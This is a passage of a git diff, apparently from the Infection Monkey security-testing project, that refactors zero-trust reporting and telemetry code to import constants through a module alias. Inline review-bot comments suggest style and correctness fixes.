Finding.save_finding(zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_FAILED, + []) # devices failed = 1 # devices unexecuted = 1 # people verify = 1 # networks verify = 1 - Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY, []) # people verify = 2 # networks verify = 2 - Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY, []) # data failed 1 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 2 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, 
zero_trust_consts.STATUS_FAILED, []) # data failed 3 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 4 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 5 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data verify 1 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY, []) # data verify 2 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY, []) # data passed 1 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_PASSED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_PASSED, []) class TestZeroTrustService(IslandTestCase): 
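Review bot: In `EXPECTED_DICT` the DATA and DEVICES entries break the expression before the subscript (`"test": zero_trust_consts.TESTS_MAP` on one line, `[zero_trust_consts.TEST_DATA_ENDPOINT_HTTP][...]` on the next), which only parses as a subscript because it sits inside the enclosing braces and reads at a glance like a stray list literal; the NETWORKS, PEOPLE and VISIBILITY_ANALYTICS entries in the same hunk break after the `[` instead. Use the latter form for the four DATA/DEVICES entries, e.g. `"test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_DATA_ENDPOINT_HTTP][` followed by `zero_trust_consts.TEST_EXPLANATION_KEY]`, so every entry is written the same way. The three `Finding.save_finding(..., []) # devices passed = 1` calls in `save_example_findings` likewise split the empty-list argument from the call; keeping the trailing comment on its own line above the call would avoid the awkward wrap.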
@@ -191,52 +203,52 @@ class TestZeroTrustService(IslandTestCase): expected = [ { - STATUS_FAILED: 5, - STATUS_VERIFY: 2, - STATUS_PASSED: 1, - STATUS_UNEXECUTED: 1, + zero_trust_consts.STATUS_FAILED: 5, + zero_trust_consts.STATUS_VERIFY: 2, + zero_trust_consts.STATUS_PASSED: 1, + zero_trust_consts.STATUS_UNEXECUTED: 1, "pillar": "Data" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 2, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 1, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 2, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 1, "pillar": "People" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 2, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 4, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 2, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 4, "pillar": "Networks" }, { - STATUS_FAILED: 1, - STATUS_VERIFY: 0, - STATUS_PASSED: 2, - STATUS_UNEXECUTED: 1, + zero_trust_consts.STATUS_FAILED: 1, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 2, + zero_trust_consts.STATUS_UNEXECUTED: 1, "pillar": "Devices" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 0, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 0, "pillar": "Workloads" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 3, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 3, "pillar": "Visibility & Analytics" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 0, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 0, "pillar": "Automation & Orchestration" } ] 
@@ -279,13 +291,13 @@ class TestZeroTrustService(IslandTestCase): self.maxDiff = None expected = { - AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED, - DEVICES: STATUS_UNEXECUTED, - NETWORKS: STATUS_UNEXECUTED, - PEOPLE: STATUS_UNEXECUTED, - VISIBILITY_ANALYTICS: STATUS_UNEXECUTED, - WORKLOADS: STATUS_UNEXECUTED, - DATA: STATUS_UNEXECUTED + zero_trust_consts.AUTOMATION_ORCHESTRATION: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DEVICES: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.NETWORKS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DATA: zero_trust_consts.STATUS_UNEXECUTED } self.assertEqual(ZeroTrustService.get_pillars_to_statuses(), expected) @@ -293,13 +305,13 @@ class TestZeroTrustService(IslandTestCase): save_example_findings() expected = { - AUTOMATION_ORCHESTRATION: STATUS_UNEXECUTED, - DEVICES: STATUS_FAILED, - NETWORKS: STATUS_VERIFY, - PEOPLE: STATUS_VERIFY, - VISIBILITY_ANALYTICS: STATUS_UNEXECUTED, - WORKLOADS: STATUS_UNEXECUTED, - DATA: STATUS_FAILED + zero_trust_consts.AUTOMATION_ORCHESTRATION: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DEVICES: zero_trust_consts.STATUS_FAILED, + zero_trust_consts.NETWORKS: zero_trust_consts.STATUS_VERIFY, + zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_VERIFY, + zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED, + zero_trust_consts.DATA: zero_trust_consts.STATUS_FAILED } self.assertEqual(ZeroTrustService.get_pillars_to_statuses(), expected) diff --git a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py index 24bd81e0d..9937c0b6d 100644 
--- a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py @@ -1,8 +1,7 @@ import json -from common.data.zero_trust_consts import PILLARS, STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED, \ - PILLARS_TO_TESTS, TESTS_MAP, PILLARS_KEY, PRINCIPLES_TO_TESTS, PRINCIPLES_TO_PILLARS, PRINCIPLES, ORDERED_TEST_STATUSES, \ - TEST_EXPLANATION_KEY, FINDING_EXPLANATION_BY_STATUS_KEY +import common.data.zero_trust_consts as zero_trust_consts + from monkey_island.cc.models.zero_trust.finding import Finding @@ -10,7 +9,7 @@ class ZeroTrustService(object): @staticmethod def get_pillars_grades(): pillars_grades = [] - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: pillars_grades.append(ZeroTrustService.__get_pillar_grade(pillar)) return pillars_grades @@ -19,13 +18,13 @@ class ZeroTrustService(object): all_findings = Finding.objects() pillar_grade = { "pillar": pillar, - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 0 + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 0 } - tests_of_this_pillar = PILLARS_TO_TESTS[pillar] + tests_of_this_pillar = zero_trust_consts.PILLARS_TO_TESTS[pillar] test_unexecuted = {} for test in tests_of_this_pillar: @@ -33,11 +32,11 @@ class ZeroTrustService(object): for finding in all_findings: test_unexecuted[finding.test] = False - test_info = TESTS_MAP[finding.test] - if pillar in test_info[PILLARS_KEY]: + test_info = zero_trust_consts.TESTS_MAP[finding.test] + if pillar in test_info[zero_trust_consts.PILLARS_KEY]: pillar_grade[finding.status] += 1 - pillar_grade[STATUS_UNEXECUTED] = sum(1 for condition in list(test_unexecuted.values()) if condition) + pillar_grade[zero_trust_consts.STATUS_UNEXECUTED] = sum(1 for condition in list(test_unexecuted.values()) if condition) return pillar_grade 
@@ -46,14 +45,14 @@ class ZeroTrustService(object): all_principles_statuses = {} # init with empty lists - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: all_principles_statuses[pillar] = [] - for principle, principle_tests in list(PRINCIPLES_TO_TESTS.items()): - for pillar in PRINCIPLES_TO_PILLARS[principle]: + for principle, principle_tests in list(zero_trust_consts.PRINCIPLES_TO_TESTS.items()): + for pillar in zero_trust_consts.PRINCIPLES_TO_PILLARS[principle]: all_principles_statuses[pillar].append( { - "principle": PRINCIPLES[principle], + "principle": zero_trust_consts.PRINCIPLES[principle], "tests": ZeroTrustService.__get_tests_status(principle_tests), "status": ZeroTrustService.__get_principle_status(principle_tests) } @@ -63,13 +62,13 @@ class ZeroTrustService(object): @staticmethod def __get_principle_status(principle_tests): - worst_status = STATUS_UNEXECUTED + worst_status = zero_trust_consts.STATUS_UNEXECUTED all_statuses = set() for test in principle_tests: all_statuses |= set(Finding.objects(test=test).distinct("status")) for status in all_statuses: - if ORDERED_TEST_STATUSES.index(status) < ORDERED_TEST_STATUSES.index(worst_status): + if zero_trust_consts.ORDERED_TEST_STATUSES.index(status) < zero_trust_consts.ORDERED_TEST_STATUSES.index(worst_status): worst_status = status return worst_status @@ -81,7 +80,7 @@ class ZeroTrustService(object): test_findings = Finding.objects(test=test) results.append( { - "test": TESTS_MAP[test][TEST_EXPLANATION_KEY], + "test": zero_trust_consts.TESTS_MAP[test][zero_trust_consts.TEST_EXPLANATION_KEY], "status": ZeroTrustService.__get_lcd_worst_status_for_test(test_findings) } ) 
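Review bot: In `__get_principle_status` the comparison now reads `if zero_trust_consts.ORDERED_TEST_STATUSES.index(status) < zero_trust_consts.ORDERED_TEST_STATUSES.index(worst_status):`, which is long and repeats the lookup on both sides; the same line appears in `__get_lcd_worst_status_for_test` in the next hunk. Binding the lookup once, `severity = zero_trust_consts.ORDERED_TEST_STATUSES.index`, and comparing `severity(status) < severity(worst_status)` preserves behaviour and the line length; alternatively the loop reduces to `worst_status = min(all_statuses | {worst_status}, key=severity)`, since it only keeps the status with the lowest index. The `list(...)` wrapper around `.items()` in the `get_principles_status` hunk above is a Python 2 artefact that can be dropped while this file is being touched.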
@@ -94,9 +93,9 @@ class ZeroTrustService(object): :return: the "worst" (i.e. most severe) status out of the given findings. lcd stands for lowest common denominator. """ - current_worst_status = STATUS_UNEXECUTED + current_worst_status = zero_trust_consts.STATUS_UNEXECUTED for finding in all_findings_for_test: - if ORDERED_TEST_STATUSES.index(finding.status) < ORDERED_TEST_STATUSES.index(current_worst_status): + if zero_trust_consts.ORDERED_TEST_STATUSES.index(finding.status) < zero_trust_consts.ORDERED_TEST_STATUSES.index(current_worst_status): current_worst_status = finding.status return current_worst_status @@ -109,11 +108,11 @@ class ZeroTrustService(object): @staticmethod def __get_enriched_finding(finding): - test_info = TESTS_MAP[finding.test] + test_info = zero_trust_consts.TESTS_MAP[finding.test] enriched_finding = { - "test": test_info[FINDING_EXPLANATION_BY_STATUS_KEY][finding.status], + "test": test_info[zero_trust_consts.FINDING_EXPLANATION_BY_STATUS_KEY][finding.status], "test_key": finding.test, - "pillars": test_info[PILLARS_KEY], + "pillars": test_info[zero_trust_consts.PILLARS_KEY], "status": finding.status, "events": ZeroTrustService.__get_events_as_dict(finding.events) } @@ -126,12 +125,12 @@ class ZeroTrustService(object): @staticmethod def get_statuses_to_pillars(): results = { - STATUS_FAILED: [], - STATUS_VERIFY: [], - STATUS_PASSED: [], - STATUS_UNEXECUTED: [] + zero_trust_consts.STATUS_FAILED: [], + zero_trust_consts.STATUS_VERIFY: [], + zero_trust_consts.STATUS_PASSED: [], + zero_trust_consts.STATUS_UNEXECUTED: [] } - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: results[ZeroTrustService.__get_status_of_single_pillar(pillar)].append(pillar) return results @@ -139,7 +138,7 @@ class ZeroTrustService(object): @staticmethod def get_pillars_to_statuses(): results = {} - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: results[pillar] = ZeroTrustService.__get_status_of_single_pillar(pillar) return results 
@@ -147,7 +146,7 @@ class ZeroTrustService(object): @staticmethod def __get_status_of_single_pillar(pillar): grade = ZeroTrustService.__get_pillar_grade(pillar) - for status in ORDERED_TEST_STATUSES: + for status in zero_trust_consts.ORDERED_TEST_STATUSES: if grade[status] > 0: return status - return STATUS_UNEXECUTED + return zero_trust_consts.STATUS_UNEXECUTED diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py index db5b6445d..ddc1af65b 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py @@ -1,7 +1,6 @@ import json -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_LOCAL, \ - STATUS_PASSED, STATUS_FAILED, TEST_ENDPOINT_SECURITY_EXISTS +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event @@ -14,7 +13,7 @@ def test_antivirus_existence(telemetry_json): process_list_event = Event.create_event( title="Process list", message="Monkey on {} scanned the process list".format(current_monkey.hostname), - event_type=EVENT_TYPE_MONKEY_LOCAL) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL) events = [process_list_event] av_processes = filter_av_processes(telemetry_json) 
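Review bot: `__get_status_of_single_pillar` in the `@@ -147,7` hunk returns the first status whose count is non-zero, which is only the pillar's worst status because `ORDERED_TEST_STATUSES` is sorted most-severe-first — a fact stated only in the docstring of `__get_lcd_worst_status_for_test` further up, where a lower index is treated as worse. A one-line comment above the loop, `# ORDERED_TEST_STATUSES is ordered most severe first, so the first non-zero count is the pillar's worst status`, would make that dependency explicit next to the code that relies on it.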
@@ -24,15 +23,15 @@ def test_antivirus_existence(telemetry_json): title="Found AV process", message="The process '{}' was recognized as an Anti Virus process. Process " "details: {}".format(process[1]['name'], json.dumps(process[1])), - event_type=EVENT_TYPE_MONKEY_LOCAL + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL )) if len(av_processes) > 0: - test_status = STATUS_PASSED + test_status = zero_trust_consts.STATUS_PASSED else: - test_status = STATUS_FAILED + test_status = zero_trust_consts.STATUS_FAILED AggregateFinding.create_or_add_to_existing( - test=TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events + test=zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py index 6c5b1154b..f6af5e4bf 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py @@ -1,5 +1,4 @@ -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_COMMUNICATE_AS_NEW_USER, \ - STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event 
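Review bot: `if len(av_processes) > 0:` in this hunk assumes `filter_av_processes` returns a sized container; its body is not in the diff, and if it returns a lazy `filter` object under Python 3 (this series is a 2-to-3 port) the `len()` raises `TypeError`, after the preceding loop has already drained the iterator. Either materialise it where it is assigned in the previous hunk, `av_processes = list(filter_av_processes(telemetry_json))`, or, once it is a list, write the condition as `if av_processes:`. `test_antivirus_existence` starts in the previous hunk and the loop header over `av_processes` is outside this one.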
@@ -10,9 +9,9 @@ COMM_AS_NEW_USER_SUCCEEDED_FORMAT = \ def test_new_user_communication(current_monkey, success, message): AggregateFinding.create_or_add_to_existing( - test=TEST_COMMUNICATE_AS_NEW_USER, + test=zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER, # If the monkey succeeded to create a user, then the test failed. - status=STATUS_FAILED if success else STATUS_PASSED, + status=zero_trust_consts.STATUS_FAILED if success else zero_trust_consts.STATUS_PASSED, events=[ get_attempt_event(current_monkey), get_result_event(current_monkey, message, success) @@ -24,7 +23,7 @@ def get_attempt_event(current_monkey): tried_to_communicate_event = Event.create_event( title="Communicate as new user", message="Monkey on {} tried to create a new user and communicate from it.".format(current_monkey.hostname), - event_type=EVENT_TYPE_MONKEY_NETWORK) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) return tried_to_communicate_event @@ -34,4 +33,4 @@ def get_result_event(current_monkey, message, success): return Event.create_event( title="Communicate as new user", message=message_format.format(current_monkey.hostname, message), - event_type=EVENT_TYPE_MONKEY_NETWORK) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py index e6afcf088..d7b447e4a 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py 
@@ -1,8 +1,7 @@ import json from common.data.network_consts import ES_SERVICE -from common.data.zero_trust_consts import STATUS_PASSED, EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_DATA_ENDPOINT_HTTP, \ - TEST_DATA_ENDPOINT_ELASTIC +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event @@ -13,8 +12,8 @@ HTTP_SERVERS_SERVICES_NAMES = ['tcp-80'] def test_open_data_endpoints(telemetry_json): services = telemetry_json["data"]["machine"]["services"] current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']) - found_http_server_status = STATUS_PASSED - found_elastic_search_server = STATUS_PASSED + found_http_server_status = zero_trust_consts.STATUS_PASSED + found_elastic_search_server = zero_trust_consts.STATUS_PASSED events = [ Event.create_event( @@ -22,7 +21,7 @@ def test_open_data_endpoints(telemetry_json): message="Monkey on {} tried to perform a network scan, the target was {}.".format( current_monkey.hostname, telemetry_json["data"]["machine"]["ip_addr"]), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=telemetry_json["timestamp"] ) ] @@ -31,10 +30,10 @@ def test_open_data_endpoints(telemetry_json): events.append(Event.create_event( title="Scan telemetry analysis", message="Scanned service: {}.".format(service_name), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK )) if service_name in HTTP_SERVERS_SERVICES_NAMES: - found_http_server_status = STATUS_FAILED + found_http_server_status = zero_trust_consts.STATUS_FAILED events.append(Event.create_event( title="Scan telemetry analysis", message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( 
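Review bot: The two status locals on the new side of the `@@ -13,8` hunk are named inconsistently: `found_http_server_status` carries a `_status` suffix while `found_elastic_search_server` does not, although both hold a `zero_trust_consts.STATUS_*` value. Renaming the second to `found_elastic_search_server_status` here, at its reassignment in the `@@ -42,10` hunk and at its use in the `@@ -53,17` hunk makes the pair read as what they are. `test_open_data_endpoints` continues past this line into those hunks.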
@@ -42,10 +41,10 @@ def test_open_data_endpoints(telemetry_json): telemetry_json["data"]["machine"]["ip_addr"], json.dumps(service_data) ), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK )) if service_name == ES_SERVICE: - found_elastic_search_server = STATUS_FAILED + found_elastic_search_server = zero_trust_consts.STATUS_FAILED events.append(Event.create_event( title="Scan telemetry analysis", message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( @@ -53,17 +52,17 @@ def test_open_data_endpoints(telemetry_json): telemetry_json["data"]["machine"]["ip_addr"], json.dumps(service_data) ), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK )) AggregateFinding.create_or_add_to_existing( - test=TEST_DATA_ENDPOINT_HTTP, + test=zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, status=found_http_server_status, events=events ) AggregateFinding.create_or_add_to_existing( - test=TEST_DATA_ENDPOINT_ELASTIC, + test=zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC, status=found_elastic_search_server, events=events ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py index fe0015576..8c128e7f9 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED, STATUS_FAILED, TEST_MACHINE_EXPLOITED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event 
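Review bot: Both `AggregateFinding.create_or_add_to_existing` calls in the `@@ -53,17` hunk receive the same `events` list, so the HTTP finding carries the Elasticsearch detection event appended in the `@@ -42,10` hunk and the Elasticsearch finding carries the HTTP one. If that is deliberate, a comment such as `# Both findings intentionally share the full scan timeline` above the first call would stop the next reader from "fixing" it; otherwise collect the per-service detection events in separate lists and pass `events + http_events` and `events + elastic_events` respectively. `test_open_data_endpoints` starts in the hunks on the previous line.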
@@ -11,11 +11,11 @@ def test_machine_exploited(current_monkey, exploit_successful, exploiter, target current_monkey.hostname, target_ip, exploiter), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=timestamp ) ] - status = STATUS_PASSED + status = zero_trust_consts.STATUS_PASSED if exploit_successful: events.append( Event.create_event( @@ -24,13 +24,13 @@ def test_machine_exploited(current_monkey, exploit_successful, exploiter, target current_monkey.hostname, target_ip, exploiter), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=timestamp) ) - status = STATUS_FAILED + status = zero_trust_consts.STATUS_FAILED AggregateFinding.create_or_add_to_existing( - test=TEST_MACHINE_EXPLOITED, + test=zero_trust_consts.TEST_MACHINE_EXPLOITED, status=status, events=events ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py index 626a4cc52..f2c3f61b6 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py @@ -1,6 +1,6 @@ import itertools -from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from common.network.network_range import NetworkRange from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst, get_ip_if_in_subnet from monkey_island.cc.models import Monkey 
@@ -28,7 +28,7 @@ def test_segmentation_violation(current_monkey, target_ip): event = get_segmentation_violation_event(current_monkey, source_subnet, target_ip, target_subnet) SegmentationFinding.create_or_add_to_existing_finding( subnets=[source_subnet, target_subnet], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -66,7 +66,7 @@ def get_segmentation_violation_event(current_monkey, source_subnet, target_ip, t target_ip=target_ip, target_seg=target_subnet ), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) @@ -92,7 +92,7 @@ def create_or_add_findings_for_all_pairs(all_subnets, current_monkey): for subnet_pair in all_subnets_pairs_for_this_monkey: SegmentationFinding.create_or_add_to_existing_finding( subnets=list(subnet_pair), - status=STATUS_PASSED, + status=zero_trust_consts.STATUS_PASSED, segmentation_event=get_segmentation_done_event(current_monkey, subnet_pair) ) @@ -104,5 +104,5 @@ def get_segmentation_done_event(current_monkey, subnet_pair): hostname=current_monkey.hostname, src_seg=subnet_pair[0], dst_seg=subnet_pair[1]), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py index 900ac2f89..50d5f1c0b 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py 
@@ -1,7 +1,6 @@ import uuid -from common.data.zero_trust_consts import TEST_SEGMENTATION, STATUS_PASSED, STATUS_FAILED, \ - EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding 
@@ -26,21 +25,29 @@ class TestSegmentationTests(IslandTestCase): ip_addresses=[FIRST_SUBNET]) # no findings - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 0) + self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 0) # This is like the monkey is done and sent done telem create_or_add_findings_for_all_pairs(all_subnets, monkey) # There are 2 subnets in which the monkey is NOT - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_PASSED)), 2) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED)), + 2) # This is a monkey from 2nd subnet communicated with 1st subnet. SegmentationFinding.create_or_add_to_existing_finding( [FIRST_SUBNET, SECOND_SUBNET], - STATUS_FAILED, - Event.create_event(title="sdf", message="asd", event_type=EVENT_TYPE_MONKEY_NETWORK) + zero_trust_consts.STATUS_FAILED, + Event.create_event(title="sdf", message="asd", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) ) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_PASSED)), 1) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_FAILED)), 1) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 2) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED)), + 1) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED)), + 1) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), + 2) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py index ce34c2bb4..e402525c8 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py 
